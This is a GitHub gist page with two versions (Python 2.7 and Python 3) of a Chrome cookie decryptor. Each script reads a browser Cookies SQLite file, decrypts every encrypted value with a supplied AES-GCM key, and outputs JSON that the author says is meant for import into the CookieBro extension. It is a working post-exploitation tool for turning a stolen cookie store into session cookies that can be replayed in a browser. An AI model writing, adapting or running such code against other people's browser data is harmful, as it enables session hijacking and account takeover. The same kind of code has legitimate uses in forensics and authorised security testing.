Skip to content

Instantly share code, notes, and snippets.

@jackson5sec
Created November 7, 2023 17:02
Show Gist options
  • Save jackson5sec/a5e814ffe9369e47bf1e633456da2a34 to your computer and use it in GitHub Desktop.
Save jackson5sec/a5e814ffe9369e47bf1e633456da2a34 to your computer and use it in GitHub Desktop.
Chrome Cookie Decryptor with AES State Key
import sqlite3
import sys
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
import binascii
import json
# Python2.7 script
def decrypt_payload(cipher, payload):
return cipher.decrypt(payload)
def generate_cipher(aes_key, iv):
return AES.new(aes_key, AES.MODE_GCM, iv)
def decrypt_password(ciphertext, secret_key):
try:
initialisation_vector = ciphertext[3:15]
encrypted_password = ciphertext[15:-16]
cipher = generate_cipher(secret_key, initialisation_vector)
decrypted_pass = decrypt_payload(cipher, encrypted_password)
decrypted_pass = decrypted_pass.decode('utf-8')
return decrypted_pass
except Exception as e:
print("Error: " + str(e))
print("[ERR] Unable to decrypt. Please check.")
return ""
if len(sys.argv) != 3:
print("Usage: python script.py <cookies_file_path> <static_aes_key_hex>")
sys.exit(1)
cookies_file_path = sys.argv[1]
static_aes_key_hex = sys.argv[2]
try:
static_aes_key = binascii.unhexlify(static_aes_key_hex)
except binascii.Error:
print("Error: Invalid hexadecimal key.")
sys.exit(1)
conn = sqlite3.connect(cookies_file_path)
cursor = conn.cursor()
cursor.execute('SELECT host_key, expires_utc, name, path, encrypted_value FROM cookies')
cookies = []
for row in cursor.fetchall():
try:
host_key, expires_utc, name, path, encrypted_value = row
decrypted_value = decrypt_password(encrypted_value, static_aes_key)
cookie = {
"domain": host_key,
"expirationDate": expires_utc,
"name": name,
"path": path,
"value": decrypted_value
}
cookies.append(cookie)
except Exception as e:
print("Error decrypting cookie: " + str(e))
conn.close()
print(json.dumps(cookies, indent=4))
import sqlite3
import sys
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import binascii
import json
# Python3 script
def decrypt_payload(cipher, payload):
return cipher.decrypt(payload)
def generate_cipher(aes_key, iv):
return AES.new(aes_key, AES.MODE_GCM, iv)
def decrypt_password(ciphertext, secret_key):
try:
initialisation_vector = ciphertext[3:15]
encrypted_password = ciphertext[15:-16]
cipher = generate_cipher(secret_key, initialisation_vector)
decrypted_pass = decrypt_payload(cipher, encrypted_password)
decrypted_pass = decrypted_pass.decode('utf-8')
return decrypted_pass
except Exception as e:
print(f"Error: {str(e)}")
print("[ERR] Unable to decrypt. Please check.")
return ""
if len(sys.argv) != 3:
print("Usage: python script.py <cookies_file_path> <static_aes_key_hex>")
sys.exit(1)
cookies_file_path = sys.argv[1]
static_aes_key_hex = sys.argv[2]
try:
static_aes_key = binascii.unhexlify(static_aes_key_hex)
except binascii.Error:
print("Error: Invalid hexadecimal key.")
sys.exit(1)
conn = sqlite3.connect(cookies_file_path)
cursor = conn.cursor()
cursor.execute('SELECT host_key, expires_utc, name, path, encrypted_value FROM cookies')
cookies = []
for row in cursor.fetchall():
try:
host_key, expires_utc, name, path, encrypted_value = row
decrypted_value = decrypt_password(encrypted_value, static_aes_key)
cookie = {
"domain": host_key,
"expirationDate": expires_utc,
"name": name,
"path": path,
"value": decrypted_value
}
cookies.append(cookie)
except Exception as e:
print(f"Error decrypting cookie: {str(e)}")
conn.close()
# Print cookies in JSON format
print(json.dumps(cookies, indent=4))
@jackson5sec
Copy link
Author

pip install pycryptodome
pip3 install pycryptodome

@jackson5sec
Copy link
Author

Outputs in json format for CookieBro extension

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment